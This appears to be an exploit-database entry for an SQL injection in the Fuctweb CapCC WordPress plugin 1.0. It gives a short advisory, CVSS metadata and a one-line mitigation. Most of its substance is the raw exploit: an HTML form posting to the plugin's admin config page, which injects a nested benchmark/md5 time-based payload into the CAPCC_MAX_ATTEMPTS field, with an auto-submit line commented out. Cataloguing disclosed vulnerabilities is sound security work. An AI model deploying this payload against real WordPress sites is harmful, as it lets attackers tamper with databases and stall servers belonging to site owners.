header-logo
Suggest Exploit
vendor:
Fuctweb CapCC Plugin for WordPress
by:
MustLive
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Fuctweb CapCC Plugin for WordPress
Affected Version From: CapCC 1.0
Affected Version To: Other versions may also be vulnerable.
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CapCC SQL Injection exploit (C) 2008 MustLive. http://websecurity.com.ua

Fuctweb CapCC Plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Sanitize user-supplied data before using it in an SQL query.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39038/info

Fuctweb CapCC Plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CapCC 1.0 is affected; other versions may also be vulnerable.

<html> <head> <title>CapCC SQL Injection exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/plugins.php?page=capcc-config" method="post"> <input type="hidden" name="CAPCC_MAX_ATTEMPTS" value="5 and benchmark(10000000,benchmark(10000000,md5(now())))"> </form> </body> </html>